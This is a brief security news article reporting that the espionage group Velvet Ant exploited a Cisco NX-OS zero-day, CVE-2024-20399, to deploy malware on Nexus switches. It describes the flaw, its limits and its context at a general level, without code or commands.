Adrian Johnson
TLDR:
- A cyber espionage group named Velvet Ant is exploiting a zero-day flaw in Cisco NX-OS Software to deliver malware.
- The vulnerability allows authenticated, local attackers to execute arbitrary commands as root on affected devices.
A China-linked cyber espionage group known as Velvet Ant has been leveraging a zero-day vulnerability in Cisco NX-OS Software to distribute malware. Tracked as CVE-2024-20399, the vulnerability permits authenticated, local attackers to run arbitrary commands as root on the underlying operating system of affected devices. This flaw, which has a CVSS score of 6.0, enables the execution of custom malware that allows remote connections to compromised Cisco Nexus devices.
The issue arises from insufficient validation of arguments passed to specific configuration CLI commands, allowing attackers to include crafted input as arguments and execute commands without triggering system syslog messages. Despite the severity of the flaw, successful exploitation necessitates an attacker to have administrator credentials and access to specific configuration commands. The impacted devices include various Nexus series switches.
Velvet Ant, initially documented by Sygnia in connection with a cyber attack in East Asia, has been targeting organizations for years by establishing persistence using outdated network appliances. The lack of monitoring of network appliances poses challenges in identifying malicious activities. This incident coincides with threat actors exploiting a critical vulnerability in D-Link routers to gather sensitive information.
